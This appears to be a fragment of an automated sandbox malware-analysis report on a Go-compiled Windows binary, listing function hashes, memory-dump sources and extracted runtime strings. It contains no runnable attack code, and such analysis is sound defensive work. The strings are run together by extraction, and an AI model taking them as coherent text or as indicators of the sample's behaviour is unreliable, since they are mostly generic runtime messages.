                                                                                • Opcode ID: 40878a3ce37afff76de0dbb0ba017283d84cc0e8c0c1f527e5a3a3f426383026
                                                                                • Instruction ID: 2c9fd6dd4fa8658fca995b92f18b7d0e4345c53d4d1589d7ecfa1588632fd476
                                                                                • Opcode Fuzzy Hash: 40878a3ce37afff76de0dbb0ba017283d84cc0e8c0c1f527e5a3a3f426383026
                                                                                • Instruction Fuzzy Hash: 9C51E1B8909740CFC700EF25D194B1ABBE0BF88708F91886DE8889B352E774D945DB52
                                                                                Strings
                                                                                • 1, xrefs: 00ABAA88
                                                                                • freeIndex is not validgetenv before env initheadTailIndex overflowinteger divide by zerointerface conversion: internal inconsistencyinvalid number base %dkernel32.dll not foundminpc or maxpc invalidmissing ']' in addressnetwork is unreachablenon-Go function at, xrefs: 00ABA9FD
                                                                                • s.nelems= schedtick= span.list= timerslen=%!(BADPREC), elemsize=, npages = -syncWithWU/dev/stderr/dev/stdout30517578125: frame.sp=AssemblyRefBLAKE2b-256BLAKE2b-384BLAKE2b-512BLAKE2s-256BoundImportClassHESIODClassLayoutCloseHandleCoGetObjectCreateFileWDelayIm, xrefs: 00ABA9B3, 00ABAA4B
                                                                                • s.allocCount > s.nelemsschedule: holding lockssegment length too longshrinkstack at bad timespan has no free stacksstack growth after forksyntax error in patternsystem huge page size (too many pointers (>10)truncated tag or lengthwork.nwait > work.nprocx509: i, xrefs: 00ABA9E7
                                                                                • runtime: s.allocCount= s.allocCount > s.nelemsschedule: holding lockssegment length too longshrinkstack at bad timespan has no free stacksstack growth after forksyntax error in patternsystem huge page size (too many pointers (>10)truncated tag or lengthwork.nw, xrefs: 00ABAA1D
                                                                                • s.allocCount= semaRoot queuestack overflowstopm spinningstore64 failedsync.Cond.Waittext file busytime.Location(timeEndPeriod, xrefs: 00ABA985
                                                                                • s.allocCount != s.nelems && freeIndex == s.nelemsslice bounds out of range [::%x] with capacity %ystrings.Reader.UnreadByte: at beginning of stringstrings.Reader.WriteTo: invalid WriteString countsweeper left outstanding across sweep generationsx509: Ed25519 k, xrefs: 00ABAA7F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: s.nelems= schedtick= span.list= timerslen=%!(BADPREC), elemsize=, npages = -syncWithWU/dev/stderr/dev/stdout30517578125: frame.sp=AssemblyRefBLAKE2b-256BLAKE2b-384BLAKE2b-512BLAKE2s-256BoundImportClassHESIODClassLayoutCloseHandleCoGetObjectCreateFileWDelayIm$1$freeIndex is not validgetenv before env initheadTailIndex overflowinteger divide by zerointerface conversion: internal inconsistencyinvalid number base %dkernel32.dll not foundminpc or maxpc invalidmissing ']' in addressnetwork is unreachablenon-Go function at$runtime: s.allocCount= s.allocCount > s.nelemsschedule: holding lockssegment length too longshrinkstack at bad timespan has no free stacksstack growth after forksyntax error in patternsystem huge page size (too many pointers (>10)truncated tag or lengthwork.nw$s.allocCount != s.nelems && freeIndex == s.nelemsslice bounds out of range [::%x] with capacity %ystrings.Reader.UnreadByte: at beginning of stringstrings.Reader.WriteTo: invalid WriteString countsweeper left outstanding across sweep generationsx509: Ed25519 k$s.allocCount > s.nelemsschedule: holding lockssegment length too longshrinkstack at bad timespan has no free stacksstack growth after forksyntax error in patternsystem huge page size (too many pointers (>10)truncated tag or lengthwork.nwait > work.nprocx509: i$s.allocCount= semaRoot queuestack overflowstopm spinningstore64 failedsync.Cond.Waittext file busytime.Location(timeEndPeriod
                                                                                • API String ID: 0-3154549764
                                                                                • Opcode ID: 607ffecd1e4e67060d3a21c269e4e4bba4783caad85b4363a6ef2a2e06c37016
                                                                                • Instruction ID: cdb74c2d55dc1a3148c4993610eb5982ba9969e713caeceee08d59e55a9d5792
                                                                                • Opcode Fuzzy Hash: 607ffecd1e4e67060d3a21c269e4e4bba4783caad85b4363a6ef2a2e06c37016
                                                                                • Instruction Fuzzy Hash: EA51F5B49087848FC340EF65D29466EBBE0BF88708F51886DE8C887242E775D945DB63
                                                                                Strings
                                                                                • , newval=, oldval=, size = , tail = -07:00:00244140625: status=AuthorityBassa_VahBhaiksukiClassINETCuneiformDiacriticExceptionFindCloseGlobalPtrHex_DigitInheritedInterfaceKhudawadiLocalFreeMalayalamMemberRefMethodDefMethodPtrModuleRefMongolianMoveFileWNabataea, xrefs: 00AE7B69, 00AE7C10
                                                                                • casfrom_Gscanstatus:top gp->status is not in scan stategentraceback callback cannot be used with non-zero skipinvalid NT Header Offset. NT Header Signature not foundos: invalid use of WriteAt on file opened with O_APPEND : internal error: invalid use of , xrefs: 00AE7C50
                                                                                • 7, xrefs: 00AE7C59
                                                                                • , oldval=, size = , tail = -07:00:00244140625: status=AuthorityBassa_VahBhaiksukiClassINETCuneiformDiacriticExceptionFindCloseGlobalPtrHex_DigitInheritedInterfaceKhudawadiLocalFreeMalayalamMemberRefMethodDefMethodPtrModuleRefMongolianMoveFileWNabataeanPalmyren, xrefs: 00AE7B3F, 00AE7BE6
                                                                                • runtime: casfrom_Gscanstatus bad oldval gp=runtime: heapBitsSetTypeGCProg: total bits runtime: releaseSudog with non-nil gp.paramruntime:stoplockedm: lockedg (atomicstatus=transform: inconsistent byte count returnedunfinished open-coded defers in deferreturnun, xrefs: 00AE7BC4
                                                                                • casfrom_Gscanstatus: gp->status is not in scan state : message too long for RSA public key sizeencountered an error while unpacking image CHPE Metaerrors: *target must be interface or implement errormallocgc called without a P or outside bootstrapping, xrefs: 00AE7BA9
                                                                                • runtime: casfrom_Gscanstatus failed gp=stack growth not allowed in system callsuspendG from non-preemptible goroutinetags don't match (%d vs %+v) %+v %s @%dtraceback: unexpected SPWRITE function transport endpoint is already connectedx509: failed to parse URI , xrefs: 00AE7B1D
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: , newval=, oldval=, size = , tail = -07:00:00244140625: status=AuthorityBassa_VahBhaiksukiClassINETCuneiformDiacriticExceptionFindCloseGlobalPtrHex_DigitInheritedInterfaceKhudawadiLocalFreeMalayalamMemberRefMethodDefMethodPtrModuleRefMongolianMoveFileWNabataea$, oldval=, size = , tail = -07:00:00244140625: status=AuthorityBassa_VahBhaiksukiClassINETCuneiformDiacriticExceptionFindCloseGlobalPtrHex_DigitInheritedInterfaceKhudawadiLocalFreeMalayalamMemberRefMethodDefMethodPtrModuleRefMongolianMoveFileWNabataeanPalmyren$7$casfrom_Gscanstatus: gp->status is not in scan state : message too long for RSA public key sizeencountered an error while unpacking image CHPE Metaerrors: *target must be interface or implement errormallocgc called without a P or outside bootstrapping$casfrom_Gscanstatus:top gp->status is not in scan stategentraceback callback cannot be used with non-zero skipinvalid NT Header Offset. NT Header Signature not foundos: invalid use of WriteAt on file opened with O_APPEND : internal error: invalid use of $runtime: casfrom_Gscanstatus bad oldval gp=runtime: heapBitsSetTypeGCProg: total bits runtime: releaseSudog with non-nil gp.paramruntime:stoplockedm: lockedg (atomicstatus=transform: inconsistent byte count returnedunfinished open-coded defers in deferreturnun$runtime: casfrom_Gscanstatus failed gp=stack growth not allowed in system callsuspendG from non-preemptible goroutinetags don't match (%d vs %+v) %+v %s @%dtraceback: unexpected SPWRITE function transport endpoint is already connectedx509: failed to parse URI
                                                                                • API String ID: 0-3095482781
                                                                                • Opcode ID: bb6ac46058c1ae61cda93bdccfb7480c982d3bb19a5b700239d41e9bb59c5fe3
                                                                                • Instruction ID: a14314033f239407d17d08589c5fafc3d22358260ed4ec0b8c5ef2d61fbca687
                                                                                • Opcode Fuzzy Hash: bb6ac46058c1ae61cda93bdccfb7480c982d3bb19a5b700239d41e9bb59c5fe3
                                                                                • Instruction Fuzzy Hash: B741C6B4908B858FC700FF75E29575EBBE4AF84748F908C6DE4C887352E77499488B62
                                                                                Strings
                                                                                • e+, xrefs: 00AE579E
                                                                                • +Inf-Inf.bat.cmd.com.crt.exe3125: p=ACDTACSTAEDTAESTAKDTAKSTAWSTAhomAtoiCESTCOFFChamDashEESTFileGOGCINFOJulyJuneLEAFLTCGLisuMiaoMiscModiNB10NZDTNZSTNewaPOGORSDSSASTStatThaiTrapWARNXBOXm=] = ] n=allgallpasn1avx2basebindbmi1bmi2boolcallcas1cas2cas3cas4cas5cas6, xrefs: 00AE5670
                                                                                • -Inf.bat.cmd.com.crt.exe3125: p=ACDTACSTAEDTAESTAKDTAKSTAWSTAhomAtoiCESTCOFFChamDashEESTFileGOGCINFOJulyJuneLEAFLTCGLisuMiaoMiscModiNB10NZDTNZSTNewaPOGORSDSSASTStatThaiTrapWARNXBOXm=] = ] n=allgallpasn1avx2basebindbmi1bmi2boolcallcas1cas2cas3cas4cas5cas6chan, xrefs: 00AE5656
                                                                                • -, xrefs: 00AE56DA
                                                                                • ., xrefs: 00AE5799
                                                                                • -, xrefs: 00AE57A9
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: +Inf-Inf.bat.cmd.com.crt.exe3125: p=ACDTACSTAEDTAESTAKDTAKSTAWSTAhomAtoiCESTCOFFChamDashEESTFileGOGCINFOJulyJuneLEAFLTCGLisuMiaoMiscModiNB10NZDTNZSTNewaPOGORSDSSASTStatThaiTrapWARNXBOXm=] = ] n=allgallpasn1avx2basebindbmi1bmi2boolcallcas1cas2cas3cas4cas5cas6$-$-$-Inf.bat.cmd.com.crt.exe3125: p=ACDTACSTAEDTAESTAKDTAKSTAWSTAhomAtoiCESTCOFFChamDashEESTFileGOGCINFOJulyJuneLEAFLTCGLisuMiaoMiscModiNB10NZDTNZSTNewaPOGORSDSSASTStatThaiTrapWARNXBOXm=] = ] n=allgallpasn1avx2basebindbmi1bmi2boolcallcas1cas2cas3cas4cas5cas6chan$.$e+
                                                                                • API String ID: 0-1812657216
                                                                                • Opcode ID: 7129ce8d4527f072217785f5264bc81c2d50711049ab8a77c619745ea94eb350
                                                                                • Instruction ID: b60946e58b6ebf9c9cba33952dad0aeca0798954ad6d7a4cc58acb4231b57b70
                                                                                • Opcode Fuzzy Hash: 7129ce8d4527f072217785f5264bc81c2d50711049ab8a77c619745ea94eb350
                                                                                • Instruction Fuzzy Hash: 88512D71C09FC08FC70BEF3AE05532A77956FA2388F848B5EE48766192E77045598643
                                                                                Strings
                                                                                • types value=abortedconnectconsolecpuproffloat32float64forcegcgctracehead = invalidminpc= pacer: panic: readdirrunningserial:signal syscalluintptrunknownwaiting bytes, etypes is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= pointer stack=[ st, xrefs: 00B06AFA
                                                                                • runtime: textOff runtime: typeOff scanobject n == 0select (no cases)stack: frame={sp:swept cached spanthread exhaustionunknown caller pcunknown type kindwait for GC cyclewine_get_version, xrefs: 00B06A42
                                                                                • not in ranges: untyped locals , not a function0123456789ABCDEF0123456789abcdef2384185791015625: value of type AddDllDirectory, xrefs: 00B06A97
                                                                                • runtime: text offset base pointer out of rangeruntime: type offset base pointer out of rangesignal arrived during external code executionslice bounds out of range [:%x] with length %ystopTheWorld: not stopped (status != _Pgcstop)sysGrow bounds not aligned to , xrefs: 00B06B6A
                                                                                • base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util(...), i = , not .reloc390625<-chanAnswerArabicAugustBrahmiCarianChakmaCommonCopticENCLogENCMapExpectExportFlags=FormatFridayGOROOTGetACPGothicHangulHatranHebrewHy, xrefs: 00B06A6D
                                                                                • ., xrefs: 00B06B73
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: types value=abortedconnectconsolecpuproffloat32float64forcegcgctracehead = invalidminpc= pacer: panic: readdirrunningserial:signal syscalluintptrunknownwaiting bytes, etypes is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= pointer stack=[ st$ base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util(...), i = , not .reloc390625<-chanAnswerArabicAugustBrahmiCarianChakmaCommonCopticENCLogENCMapExpectExportFlags=FormatFridayGOROOTGetACPGothicHangulHatranHebrewHy$ not in ranges: untyped locals , not a function0123456789ABCDEF0123456789abcdef2384185791015625: value of type AddDllDirectory$.$runtime: text offset base pointer out of rangeruntime: type offset base pointer out of rangesignal arrived during external code executionslice bounds out of range [:%x] with length %ystopTheWorld: not stopped (status != _Pgcstop)sysGrow bounds not aligned to $runtime: textOff runtime: typeOff scanobject n == 0select (no cases)stack: frame={sp:swept cached spanthread exhaustionunknown caller pcunknown type kindwait for GC cyclewine_get_version
                                                                                • API String ID: 0-977601121
                                                                                • Opcode ID: acc290f7a56ba3e6748ccf2f59790e4f724ae8c414854787f78069b2533c6729
                                                                                • Instruction ID: 47cd1a00145646704910d37c5bad75b94da9edc9f3593d36161d28d6ba42b43f
                                                                                • Opcode Fuzzy Hash: acc290f7a56ba3e6748ccf2f59790e4f724ae8c414854787f78069b2533c6729
                                                                                • Instruction Fuzzy Hash: 7451F1B4908745CFC304EF35D18566ABBE0FB88308F40896DE89997392E774D989DB52
                                                                                Strings
                                                                                • runtime: found obj at *(runtime: markroot index runtime: p.searchAddr = span has no free objectsstack trace unavailablestructure needs cleaningx509: malformed validityzlib: invalid dictionary{%06X-%04X-%04X-%04X-%X} bytes failed with errno= to unused region o, xrefs: 00AC3A1F
                                                                                • +,-./05:;<=?BCMOSZ["]_`hms{} + @ P [(") )(), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03, xrefs: 00AC3A49
                                                                                • checkmark found unmarked objectcoff symbols parsing failed: %ventersyscallblock inconsistent fmt: unknown base; can't happeninternal error - misuse of itabinvalid network interface indexmalformed time zone informationnon in-use span in unswept listpacer: sweep, xrefs: 00AC3AF1
                                                                                • runtime: checkmarks found unexpected unmarked object obj=pkcs7: Message digest mismatchExpected: %XActual : %Xthe optional header exceeds the file length (%d + %d > %d)ber2der: Indefinite form tag must have constructed encodingbufio.Scanner: SplitFunc ret, xrefs: 00AC39E6
                                                                                • 9, xrefs: 00AC39EF
                                                                                • basebindbmi1bmi2boolcallcas1cas2cas3cas4cas5cas6chandeadermsfileftpsfunchourhttpicmpidleigmpint8itabkindopenpathpipepop3profquitreadrecvrootsbrkseeksendsmtpsse3tag:tcp4trueudp4uint -%s ... BOM) MB, and max= ms, ptr tab= top=+0330+0430+0530+0545+0630+0845, xrefs: 00AC3A8E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: +,-./05:;<=?BCMOSZ["]_`hms{} + @ P [(") )(), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03$9$basebindbmi1bmi2boolcallcas1cas2cas3cas4cas5cas6chandeadermsfileftpsfunchourhttpicmpidleigmpint8itabkindopenpathpipepop3profquitreadrecvrootsbrkseeksendsmtpsse3tag:tcp4trueudp4uint -%s ... BOM) MB, and max= ms, ptr tab= top=+0330+0430+0530+0545+0630+0845$checkmark found unmarked objectcoff symbols parsing failed: %ventersyscallblock inconsistent fmt: unknown base; can't happeninternal error - misuse of itabinvalid network interface indexmalformed time zone informationnon in-use span in unswept listpacer: sweep$runtime: checkmarks found unexpected unmarked object obj=pkcs7: Message digest mismatchExpected: %XActual : %Xthe optional header exceeds the file length (%d + %d > %d)ber2der: Indefinite form tag must have constructed encodingbufio.Scanner: SplitFunc ret$runtime: found obj at *(runtime: markroot index runtime: p.searchAddr = span has no free objectsstack trace unavailablestructure needs cleaningx509: malformed validityzlib: invalid dictionary{%06X-%04X-%04X-%04X-%X} bytes failed with errno= to unused region o
                                                                                • API String ID: 0-3099054432
                                                                                • Opcode ID: 9bcb8d98a66a7be1d5bc0ae2fb5dea9845a503c43661e0c16a507ec8e5782e2a
                                                                                • Instruction ID: ea55d2125def079895b4fed325a834c87ad781e3b96c3ca5507b11b3832c2675
                                                                                • Opcode Fuzzy Hash: 9bcb8d98a66a7be1d5bc0ae2fb5dea9845a503c43661e0c16a507ec8e5782e2a
                                                                                • Instruction Fuzzy Hash: 5B410CB4509B809FC300EF29D29575EBBE0BF85708F85896DE8C88B352D774D905CB62
                                                                                Strings
                                                                                • runtime: unexpected SPWRITE function setprofilebucket: profile already setstartTheWorld: inconsistent mp->nextptoo many Additionals to pack (>65535)too many Authorities to pack (>65535)value too large for defined data typex509: RSA key missing NULL parametersx, xrefs: 00AECF22
                                                                                • bad g statusbad g0 stackbad recoverycan't happencas64 failedchan receivedumping heapend tracegcentersyscallexit status freeaddrinfogcBitsArenasgcpacertraceharddecommithost is downillegal seekinvalid baseinvalid slotiphlpapi.dllkernel32.dllmadvdontneedmheapSpe, xrefs: 00AECF9F
                                                                                • in async preempt to non-Go memory , locked to thread2980232238769531254e45544672616d6577: day out of rangeArab Standard TimeBSTR_UserUnmarshalCM_MapCrToWin32ErrCaucasian_AlbanianCertGetNameStringWCloseServiceHandleCommandLineToArgvWCreateDispTypeInfoCreateFi, xrefs: 00AECF4C
                                                                                • preempt at unknown pcread-only file system releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: work.nwait= sequence tag mismatchstale NF, xrefs: 00AECF7D
                                                                                • preempt SPWRITErecovery failed lite.Setruntime error: runtime: frame runtime: max = runtime: min = runtimer: bad pscan missed a gstartm: m has pstopm holding punknown Go type already; errno= mheap.sweepgen= not in ranges: untyped locals ,, xrefs: 00AECF67
                                                                                • %, xrefs: 00AECF2B
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: in async preempt to non-Go memory , locked to thread2980232238769531254e45544672616d6577: day out of rangeArab Standard TimeBSTR_UserUnmarshalCM_MapCrToWin32ErrCaucasian_AlbanianCertGetNameStringWCloseServiceHandleCommandLineToArgvWCreateDispTypeInfoCreateFi$%$bad g statusbad g0 stackbad recoverycan't happencas64 failedchan receivedumping heapend tracegcentersyscallexit status freeaddrinfogcBitsArenasgcpacertraceharddecommithost is downillegal seekinvalid baseinvalid slotiphlpapi.dllkernel32.dllmadvdontneedmheapSpe$preempt SPWRITErecovery failed lite.Setruntime error: runtime: frame runtime: max = runtime: min = runtimer: bad pscan missed a gstartm: m has pstopm holding punknown Go type already; errno= mheap.sweepgen= not in ranges: untyped locals ,$preempt at unknown pcread-only file system releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: work.nwait= sequence tag mismatchstale NF$runtime: unexpected SPWRITE function setprofilebucket: profile already setstartTheWorld: inconsistent mp->nextptoo many Additionals to pack (>65535)too many Authorities to pack (>65535)value too large for defined data typex509: RSA key missing NULL parametersx
                                                                                • API String ID: 0-428031113
                                                                                • Opcode ID: d1d14a554bf3c51eee8891d7f3d557e5a73c9bb98773e54a7c2ce61cd14a15e5
                                                                                • Instruction ID: 99098714261c36406f8610ab9c3e949676cf0538af45830d7db2151cd9f1d601
                                                                                • Opcode Fuzzy Hash: d1d14a554bf3c51eee8891d7f3d557e5a73c9bb98773e54a7c2ce61cd14a15e5
                                                                                • Instruction Fuzzy Hash: D44106B45087848FC304EF69D295B6EBBE1AF89704F01886DF8D88B352D775D849DB22
                                                                                Strings
                                                                                • fully empty unfreed span set block found in resetinvalid memory address or nil pointer dereferenceinvalid or incomplete multibyte or wide characternot enough significant bits after mult128bitPow10panicwrap: unexpected string after package name: , xrefs: 00ADCD91
                                                                                • head = invalidminpc= pacer: panic: readdirrunningserial:signal syscalluintptrunknownwaiting bytes, etypes is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= pointer stack=[ status %!Month(2.5.4.102.5.4.112.5.4.1748828125AcceptExArmenianAssemblyB, xrefs: 00ADCDCA
                                                                                • span set block with unpopped elements found in resetx509: cannot verify signature: insecure algorithm %vcompileCallback: argument size is larger than uintptr : string slice index out of bounds : non-interface type passed to Type.Impleme, xrefs: 00ADCDA7
                                                                                • , tail = -07:00:00244140625: status=AuthorityBassa_VahBhaiksukiClassINETCuneiformDiacriticExceptionFindCloseGlobalPtrHex_DigitInheritedInterfaceKhudawadiLocalFreeMalayalamMemberRefMethodDefMethodPtrModuleRefMongolianMoveFileWNabataeanPalmyreneParseUintRegister, xrefs: 00ADCDF4
                                                                                • #, xrefs: 00ADCE31
                                                                                • attempt to clear non-empty span setber2der: BER tag length is negativeencoding/hex: odd length hex stringexecutable file not found in %PATH%file type does not support deadlinefindrunnable: netpoll with spinninggreyobject: obj not pointer-alignedmheap.freeSpanL, xrefs: 00ADCE28
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: #$, tail = -07:00:00244140625: status=AuthorityBassa_VahBhaiksukiClassINETCuneiformDiacriticExceptionFindCloseGlobalPtrHex_DigitInheritedInterfaceKhudawadiLocalFreeMalayalamMemberRefMethodDefMethodPtrModuleRefMongolianMoveFileWNabataeanPalmyreneParseUintRegister$attempt to clear non-empty span setber2der: BER tag length is negativeencoding/hex: odd length hex stringexecutable file not found in %PATH%file type does not support deadlinefindrunnable: netpoll with spinninggreyobject: obj not pointer-alignedmheap.freeSpanL$fully empty unfreed span set block found in resetinvalid memory address or nil pointer dereferenceinvalid or incomplete multibyte or wide characternot enough significant bits after mult128bitPow10panicwrap: unexpected string after package name: $head = invalidminpc= pacer: panic: readdirrunningserial:signal syscalluintptrunknownwaiting bytes, etypes is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= pointer stack=[ status %!Month(2.5.4.102.5.4.112.5.4.1748828125AcceptExArmenianAssemblyB$span set block with unpopped elements found in resetx509: cannot verify signature: insecure algorithm %vcompileCallback: argument size is larger than uintptr : string slice index out of bounds : non-interface type passed to Type.Impleme
                                                                                • API String ID: 0-25292266
                                                                                • Opcode ID: f1ee10e3bd841944f76b991b815e44340717a9efcaacb9546e0fc643fc501976
                                                                                • Instruction ID: 6576e953926220814ae0767c71560a6ee65f591e5042482ba0065b1bf48e149f
                                                                                • Opcode Fuzzy Hash: f1ee10e3bd841944f76b991b815e44340717a9efcaacb9546e0fc643fc501976
                                                                                • Instruction Fuzzy Hash: 0B41C2B45087418FC300EF64D29576EBBE5BF89748F84886DE4C98B352D7749948CB52
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: '$'$Powe$erRegisterSuspendResumeNotification$owrprof.dll$powr
                                                                                • API String ID: 0-2222458068
                                                                                • Opcode ID: 7d13908ba561851a2acb7f4163d14e903dfdab7a2002e862e40a03154292327b
                                                                                • Instruction ID: 0613e9b356d40a5bb55cf5428cdfc4c67fc0185cef34bb144075ec45d65a4361
                                                                                • Opcode Fuzzy Hash: 7d13908ba561851a2acb7f4163d14e903dfdab7a2002e862e40a03154292327b
                                                                                • Instruction Fuzzy Hash: A831EEB45083059FD300EF24C58575ABBE0BB94348F40886EE4998B391EB75EA89CF93
                                                                                Strings
                                                                                • ), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...///125625:\/???ADT, xrefs: 00AC91AC
                                                                                • runtime: markroot index runtime: p.searchAddr = span has no free objectsstack trace unavailablestructure needs cleaningx509: malformed validityzlib: invalid dictionary{%06X-%04X-%04X-%04X-%X} bytes failed with errno= to unused region of span!#$%&'()-@^_`{}~+,, xrefs: 00AC912E
                                                                                • markroot: bad indexmissing ']' in hostmissing deferreturnmspan.sweep: state=notesleep not on g0ntdll.dll not foundnwait > work.nprocspageAlloc.scav.lockpanic during mallocpanic during panicpanic holding lockspanicwrap: no ( in panicwrap: no ) in , xrefs: 00AC91C7
                                                                                • not in stack roots range [363797880709171295166015625AddVectoredContinueHandler, xrefs: 00AC9158
                                                                                • , ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...///125625:\/???ADTAS, xrefs: 00AC9182
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: not in stack roots range [363797880709171295166015625AddVectoredContinueHandler$), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...///125625:\/???ADT$, ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...///125625:\/???ADTAS$markroot: bad indexmissing ']' in hostmissing deferreturnmspan.sweep: state=notesleep not on g0ntdll.dll not foundnwait > work.nprocspageAlloc.scav.lockpanic during mallocpanic during panicpanic holding lockspanicwrap: no ( in panicwrap: no ) in $runtime: markroot index runtime: p.searchAddr = span has no free objectsstack trace unavailablestructure needs cleaningx509: malformed validityzlib: invalid dictionary{%06X-%04X-%04X-%04X-%X} bytes failed with errno= to unused region of span!#$%&'()-@^_`{}~+,
                                                                                • API String ID: 0-1940792337
                                                                                • Opcode ID: 2f3a42c317bb0ca29d3e2c506e9892da33d48bdf02042ed31a9b4b533c1ccca6
                                                                                • Instruction ID: 50e16fa150fc7ab64d6333ee4c0dc12c642d05b8226aa6fc8ea5a6d2b9ac5c2e
                                                                                • Opcode Fuzzy Hash: 2f3a42c317bb0ca29d3e2c506e9892da33d48bdf02042ed31a9b4b533c1ccca6
                                                                                • Instruction Fuzzy Hash: 12D10474A08345CFC348EF29D594A5ABBF1BB88744F55882EE88987391EB74E844CF42
                                                                                Strings
                                                                                • runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverabletimer data corruptiontrace/breakpoint trapunexpected value stepuser defined signal 1user defined signal 2x509: invalid version%SystemR, xrefs: 00ACA121
                                                                                • nwait > work.nprocspageAlloc.scav.lockpanic during mallocpanic during panicpanic holding lockspanicwrap: no ( in panicwrap: no ) in runtime: g0 stack [runtime: pcda, xrefs: 00ACA200
                                                                                • work.nwait > work.nprocx509: invalid key usagex509: malformed UTCTimex509: malformed version116415321826934814453125582076609134674072265625AllocateAndInitializeSidAssignProcessToJobObjectAzerbaijan Standard TimeBangladesh Standard TimeBuildSecurityDescriptorW, xrefs: 00ACA17F
                                                                                • runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemsscanstack - bad statussend on closed channelspan has no free spacestack not a power of 2timer goroutine (idle)trace reader (blocked)trace: alloc too largeunexpected method stepwirep: invalid p s, xrefs: 00ACA1A2
